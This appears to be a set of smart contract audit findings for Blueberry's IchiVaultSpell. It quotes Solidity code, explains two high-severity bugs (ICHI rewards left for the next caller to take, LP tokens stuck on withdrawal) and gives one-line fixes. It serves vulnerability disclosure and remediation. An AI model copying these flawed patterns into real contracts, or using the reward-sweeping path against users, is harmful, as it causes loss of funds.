```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n
Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards
high
When a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. Part of this process is that their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, "");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again. The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.
Issue Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards\\nIn the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\n
Users who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.
```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, "");\\n return id;\\n}\\n```\\n
LP tokens are not sent back to withdrawing user
high
When users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends them back the amount they requested to withdraw, leaving the tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow token to repay to Compound\\namountLpWithdraw: the amount of the LP token to withdraw, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them for collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn in the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraw the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPay back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidate that this situation does not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow token that weren't paid back and withdrawn underlying tokens to the user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.
Add an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\n
Users who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.
```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n